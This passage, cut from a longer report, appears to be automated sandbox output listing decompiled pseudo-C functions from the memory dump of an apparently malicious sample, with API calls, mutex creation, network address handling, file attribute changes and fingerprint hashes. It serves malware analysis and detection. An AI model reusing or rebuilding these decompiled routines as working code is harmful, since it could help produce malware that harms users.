    				return E00E5D40B(_t43, E00E5C39D(_t43) + _t40, 0);
    			}

    APIs
    • memset.MSVCRT ref: 00E5B7AB
    • lstrcpynW.KERNEL32(?,?,00000100), ref: 00E5B7D5
      • Part of subcall function 00E59626: _vsnwprintf.MSVCRT ref: 00E59643
    • lstrcatW.KERNEL32(?,00000114), ref: 00E5B840
    • CharUpperBuffW.USER32(?,00000000), ref: 00E5B852
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: BuffCharUpper_vsnwprintflstrcatlstrcpynmemset
    • String ID:
    • API String ID: 1024327890-0
    • Opcode ID: 5463413ca12b3cc4075b7a82a849a8d2506ebb279e2394e1d4917d78f6cce76b
    • Instruction ID: 9fe66a403cc598cdb09e09f31a798ed88d92c5860ca64b086ad2c6bff082dfae
    • Opcode Fuzzy Hash: 5463413ca12b3cc4075b7a82a849a8d2506ebb279e2394e1d4917d78f6cce76b
    • Instruction Fuzzy Hash: 4E2174B2940218BFE700ABB5DC4AFEF77ACDB44351F1045A5F905F6182EAB45E4C8B61
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00E56F4D(void* __ecx, void* __edx, char _a4) {
    				CHAR* _v12;
    				char _v32;
    				char _v272;
    				void _v288;
    				void* _t16;
    				CHAR* _t30;
    				void* _t31;
    
    				E00E586C7( &_v288, __ecx, 0x10);
    				_t30 = E00E51080(0x357);
    				_v12 = _t30;
    				lstrcpynA( &_v272, _t30, 0xf0);
    				_t16 = E00E5C384(_t30);
    				_t4 =  &_v12; // 0xe57023
    				_t31 = _t16;
    				E00E585A8(_t4);
    				_t6 = _t31 + 0x10; // 0x10
    				E00E5F49B( &_v288, _t6,  &_v32);
    				memset( &_v288, 0, 0x100);
    				_t9 =  &_a4; // 0xe57023
    				return E00E5EACC( &_v288,  &_v32, 0x14,  *_t9);
    			}

    APIs
    • lstrcpynA.KERNEL32(?,00000000,000000F0,?,?,00000000), ref: 00E56F85
    • memset.MSVCRT ref: 00E56FBB
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: lstrcpynmemset
    • String ID: #p$#p
    • API String ID: 1726730300-739975488
    • Opcode ID: 25bad843a91e0e360c6746e2ede2e03b6ecdbcf558429a96027a2ec890e6669d
    • Instruction ID: 33eab0eabf4ecf957d2a7c531de092da597830cc04e386b4385b07427aa781dc
    • Opcode Fuzzy Hash: 25bad843a91e0e360c6746e2ede2e03b6ecdbcf558429a96027a2ec890e6669d
    • Instruction Fuzzy Hash: 81016D72C4021DBADB25EBA0DC47FCE77AC9F08341F0059A1FA05B6181EAB4A74D8BD4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E00E51A1B(intOrPtr __ecx, intOrPtr __edx, void* __fp0) {
    				CHAR* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				CHAR* _v20;
    				char _v36;
    				signed short _t22;
    				CHAR* _t23;
    				CHAR* _t24;
    				CHAR* _t32;
    				intOrPtr _t37;
    				CHAR* _t38;
    				CHAR* _t39;
    				intOrPtr _t40;
    				intOrPtr _t54;
    				char* _t57;
    				signed int _t60;
    				signed int _t61;
    				CHAR* _t62;
    				signed int _t64;
    				CHAR* _t66;
    				void* _t74;
    
    				_t74 = __fp0;
    				_t40 = __ecx;
    				_t37 = __edx;
    				_v12 = __ecx;
    				_t57 =  *0xe6e6f0; // 0x0
    				_push(_t60);
    				_t61 = _t60 | 0xffffffff;
    				_v16 = __edx;
    				_t66 = _t61;
    				if( *_t57 != 0) {
    					L6:
    					_t22 =  *0xe6e6fc; // 0x0
    					_t72 = _t22;
    					if(_t22 == 0) {
    						goto L9;
    					} else {
    						_t24 = E00E5160D(_t37, _t57, _t72, _t22 & 0x0000ffff, _t40);
    						_t66 = _t24;
    						if(_t66 < 0) {
    							goto L9;
    						} else {
    						}
    					}
    				} else {
    					_push(0x2d);
    					_t39 = E00E59E8B();
    					_v20 = _t39;
    					_t32 = E00E59E4C(0x2e);
    					_v8 = _t32;
    					if(_t39 != 0 && _t32 != _t61) {
    						_t54 =  *0xe6e6f0; // 0x0
    						E00E596B0(_t54, _t39, 0x100);
    						 *0xe6e6fc = _v8;
    					}
    					E00E58600( &_v20, _t61);
    					_t57 =  *0xe6e6f0; // 0x0
    					if( *_t57 == 0) {
    						L9:
    						_t38 = 0;
    						_v8 = 0;
    						_t23 = E00E51778( &_v8, _t74);
    						_v20 = _t23;
    						__eflags = _t23;
    						if(_t23 != 0) {
    							__eflags = _v8;
    							if(_v8 > 0) {
    								_t13 =  &(_t23[4]); // 0x4
    								_t64 = _t13;
    								while(1) {
    									__eflags =  *_t64;
    									if(__eflags != 0) {
    										__imp__#12(0x10);
    										lstrcpynA( &_v36, _t23,  *_t64);
    										_t23 = E00E5160D(_v16,  &_v36, __eflags,  *(_t64 + 4) & 0x0000ffff, _v12);
    										_t66 = _t23;
    									}
    									__eflags = _t66;
    									if(_t66 >= 0) {
    										break;
    									}
    									_t38 = _t38 + 1;
    									_t64 = _t64 + 0x20;
    									__eflags = _t38 - _v8;
    									if(_t38 < _v8) {
    										continue;
    									}
    									break;
    								}
    								_t61 = _t64 | 0xffffffff;
    								__eflags = _t61;
    							}
    							E00E58600( &_v20, _v8);
    						}
    						__eflags = _t66;
    						_t62 =  >=  ? _t66 : _t61;
    						__eflags = _t62;
    						_t24 = _t62;
    					} else {
    						_t37 = _v16;
    						_t40 = _v12;
    						goto L6;
    					}
    				}
    				return _t24;
    			}

    APIs
    • inet_ntoa.WS2_32(00000004), ref: 00E51ADB
    • lstrcpynA.KERNEL32(?,00000000), ref: 00E51AE6
      • Part of subcall function 00E596B0: memset.MSVCRT ref: 00E596D9
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: inet_ntoalstrcpynmemset
    • String ID: @}s
    • API String ID: 129148211-1738643329
    • Opcode ID: ec4a078b2f82515253cdddfc6ac890b43c0468c67a16a24a9a3598666112ea25
    • Instruction ID: 9d673ea6f8683594cd43599b40e8f45f6af313ffc4004691b801e4e5b38d6bc5
    • Opcode Fuzzy Hash: ec4a078b2f82515253cdddfc6ac890b43c0468c67a16a24a9a3598666112ea25
    • Instruction Fuzzy Hash: 92312835E00316EFDB15DFA5D880AAE77B5EB44351F141A9AE910B72C1EB709D48CB90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E00E52AEA() {
    				intOrPtr _v8;
    				signed int _v12;
    				CHAR* _v16;
    				signed int _t16;
    				intOrPtr _t21;
    				intOrPtr _t22;
    				void* _t26;
    				void* _t29;
    				signed int _t31;
    				intOrPtr _t36;
    				CHAR* _t38;
    				intOrPtr _t39;
    				void* _t40;
    
    				_t15 =  *0xe6e710 * 0x64;
    				_t39 = 0;
    				_v12 =  *0xe6e710 * 0x64;
    				_t16 = E00E585EA(_t15);
    				_t38 = _t16;
    				_v16 = _t38;
    				if(_t38 != 0) {
    					_t31 =  *0xe6e710; // 0x0
    					_t36 = 0;
    					_v8 = 0;
    					if(_t31 == 0) {
    						L9:
    						_push(_t38);
    						E00E59F2E(0xe);
    						E00E58600( &_v16, _t39);
    						return 0;
    					}
    					_t29 = 0;
    					do {
    						_t21 =  *0xe6e714; // 0x0
    						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
    							if(_t39 != 0) {
    								lstrcatA(_t38, "|");
    								_t39 = _t39 + 1;
    							}
    							_t22 =  *0xe6e714; // 0x0
    							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
    							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
    							_t26 = E00E595E7( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
    							_t31 =  *0xe6e710; // 0x0
    							_t40 = _t40 + 0x18;
    							_t36 = _v8;
    							_t39 = _t39 + _t26;
    						}
    						_t36 = _t36 + 1;
    						_t29 = _t29 + 0x20;
    						_v8 = _t36;
    					} while (_t36 < _t31);
    					goto L9;
    				}
    				return _t16 | 0xffffffff;
    			}

    APIs
      • Part of subcall function 00E585EA: RtlAllocateHeap.NTDLL(00000008,?,?,00E58F6A,00000100,?,00E55FA8), ref: 00E585F8
    • lstrcatA.KERNEL32(00000000,00E6B998,&W,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,00E55726), ref: 00E52B3D
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: AllocateHeaplstrcat
    • String ID: %u;%u;%u$&W
    • API String ID: 3011335133-3997225555
    • Opcode ID: 18cfe028cec2a502f122d4457730665e0c4ebcb1f49782d06084cb3302d6d9ce
    • Instruction ID: c085a08195d7e5eda895ae86ba77ca63e357ae050d80fbe1144407b4ba4d15d1
    • Opcode Fuzzy Hash: 18cfe028cec2a502f122d4457730665e0c4ebcb1f49782d06084cb3302d6d9ce
    • Instruction Fuzzy Hash: 0E113636A00300EFCB15DFAAECC4D9B7BB9EB85365B145D2AE900F7291DB709808CB50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E00E5153B(void* __ecx, void* __edx) {
    				void* _v8;
    				void* _t3;
    				signed int _t4;
    				intOrPtr _t5;
    				intOrPtr _t7;
    				signed int _t9;
    				void* _t24;
    
    				_push(__ecx);
    				_t3 = CreateMutexA(0, 0, 0);
    				 *0xe6e6f4 = _t3;
    				if(_t3 == 0) {
    					L11:
    					_t4 = _t3 | 0xffffffff;
    					__eflags = _t4;
    				} else {
    					_t3 = CreateMutexA(0, 0, 0);
    					 *0xe6e6dc = _t3;
    					if(_t3 == 0) {
    						goto L11;
    					} else {
    						_t3 = E00E51080(0x4ac);
    						_v8 = _t3;
    						if(_t3 == 0) {
    							goto L11;
    						} else {
    							_t5 = E00E5918C(_t3, 0);
    							_t2 =  &_v8; // 0xe556ef
    							 *0xe6e6e8 = _t5;
    							E00E585A8(_t2);
    							_t7 = E00E585EA(0x100);
    							 *0xe6e6f0 = _t7;
    							if(_t7 != 0) {
    								 *0xe6e6fc = 0;
    								_t9 = E00E585EA(0x401);
    								 *0xe6e6d4 = _t9;
    								__eflags = _t9;
    								if(_t9 != 0) {
    									__eflags =  *0xe6e6c0; // 0x0
    									if(__eflags == 0) {
    										E00E615C1(E00E581E8, E00E581F1);
    									}
    									_push(0x61e);
    									_t24 = 8;
    									 *0xe6e6a0 = E00E5E1C7(0xe6bd14, _t24);
    									_t4 = 0;
    								} else {
    									_push(0xfffffffc);
    									goto L5;
    								}
    							} else {
    								_push(0xfffffffe);
    								L5:
    								_pop(_t4);
    							}
    						}
    					}
    				}
    				return _t4;
    			}

    APIs
    • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00E556EF), ref: 00E51545
    • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00E556EF), ref: 00E5155B
      • Part of subcall function 00E585EA: RtlAllocateHeap.NTDLL(00000008,?,?,00E58F6A,00000100,?,00E55FA8), ref: 00E585F8
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: CreateMutex$AllocateHeap
    • String ID: V
    • API String ID: 704353917-4045069856
    • Opcode ID: 5d45f91a9cad80c00a70298bfea3ae09e773842f9bed0c5616c8730ac9f20fbb
    • Instruction ID: 1d5c41783fd32ed956309b7da9e00d581523431bcd2a0477e113eaaba1aac1f9
    • Opcode Fuzzy Hash: 5d45f91a9cad80c00a70298bfea3ae09e773842f9bed0c5616c8730ac9f20fbb
    • Instruction Fuzzy Hash: 8311D374605602AEE7149B77FD16A2B36E49BE17E77102E6DEC12F52D0FEF0840C8611
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E00E5B197(WCHAR* __ecx, void* __edx, void* __eflags, void* __fp0) {
    				char _v8;
    				char _v72;
    				void _v584;
    				intOrPtr _t13;
    				intOrPtr _t15;
    				char _t21;
    				intOrPtr _t23;
    				WCHAR* _t35;
    
    				_t28 = __ecx;
    				_t35 = __ecx;
    				SetFileAttributesW(__ecx, 0x80);
    				memset( &_v584, 0, 0x200);
    				E00E5A763(_t35,  &_v584, 0x200);
    				_t13 =  *0xe6e684; // 0x510f6c8
    				_push(_t35);
    				if( *((intOrPtr*)(_t13 + 0x10c))() == 0) {
    					_t15 =  *0xe6e688; // 0xe80000
    					E00E59626( &_v72, 0x20, L"%d", E00E62438(_t28, __eflags, __fp0, _t15 + 0x648, 0xf0000000, 0xffffffff));
    					_push(0);
    					_push( &_v72);
    					_push(".");
    					_t21 = E00E592CB(_t35);
    					_v8 = _t21;
    					__eflags = _t21;
    					if(_t21 == 0) {
    						L4:
    						__eflags = 0;
    						return 0;
    					}
    					_t23 = E00E5B0C4(_t35, _t21, __fp0);
    					_t7 =  &_v8; // 0xe56309
    					E00E58600(_t7, 0xfffffffe);
    					__eflags = _t23;
    					if(_t23 >= 0) {
    						goto L1;
    					}
    					goto L4;
    				}
    				L1:
    				return 1;
    			}

    APIs
    • SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000), ref: 00E5B1AA
    • memset.MSVCRT ref: 00E5B1BF
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: AttributesFilememset
    • String ID: c
    • API String ID: 2040103695-2526160730
    • Opcode ID: f611ac080795549748e26ed4d42de4ee086e8eef651f0b89c43068a4084ef8c0
    • Instruction ID: cbd7e04221ac096165bdf3b389700802ba547ed0b434ca19a3b7c1dd3c0dccc0
    • Opcode Fuzzy Hash: f611ac080795549748e26ed4d42de4ee086e8eef651f0b89c43068a4084ef8c0
    • Instruction Fuzzy Hash: 6C110632A40214BADB10A765ED0AFDF32ECDF15751F101921F900F71C1EBA0DA0986B5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E00E5825F() {
    				short* _v8;
    				char* _v12;
    				short* _t8;
    				int _t20;
    				short* _t22;
    				char* _t27;
    				int _t30;
    
    				_push(_t22);
    				_push(_t22);
    				_t8 = _t22;
    				_t30 = 0;
    				_v8 = _t8;
    				if(_t8 != 0) {
    					_t20 = WideCharToMultiByte(0xfde9, 0, _t8, 0xffffffff, 0, 0, 0, 0);
    					if(_t20 > 0) {
    						_t2 = _t20 + 1; // 0x1
    						_t27 = E00E585EA(_t2);
    						_v12 = _t27;
    						if(_t27 != 0) {
    							if(WideCharToMultiByte(0xfde9, 0, _v8, 0xffffffff, _t27, _t20, 0, 0) > 0) {
    								_v12 = _t27;
    								_t30 = E00E6018A(_t27);
    								_t7 =  &_v12; // 0xe579e5
    								E00E58600(_t7, _t20);
    							} else {
    								_t5 =  &_v12; // 0xe579e5
    								E00E58600(_t5, 0);
    							}
    						}
    					}
    				}
    				return _t30;
    			}

    APIs
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00E579E5,00000000), ref: 00E5827E
      • Part of subcall function 00E585EA: RtlAllocateHeap.NTDLL(00000008,?,?,00E58F6A,00000100,?,00E55FA8), ref: 00E585F8
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00E579E5,00000000), ref: 00E582AD
      • Part of subcall function 00E58600: RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,00E56020), ref: 00E58646
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: ByteCharHeapMultiWide$AllocateFree
    • String ID: y
    • API String ID: 2707280033-155935048
    • Opcode ID: b336d3ad693303e1c339aef1cd669794fbbc0f4e13734c99c879fb6899a189fb
    • Instruction ID: c4dcecb5801c336ba262e083a736c274fbe0b6cdefa94b6ad2f319d1f0a11594
    • Opcode Fuzzy Hash: b336d3ad693303e1c339aef1cd669794fbbc0f4e13734c99c879fb6899a189fb
    • Instruction Fuzzy Hash: 6201FE75506615BA97205AAB5D59CDB7EECDF417B1B100625F904F2191ED70CD08C2B0
    Uniqueness

    Uniqueness Score: -1.00%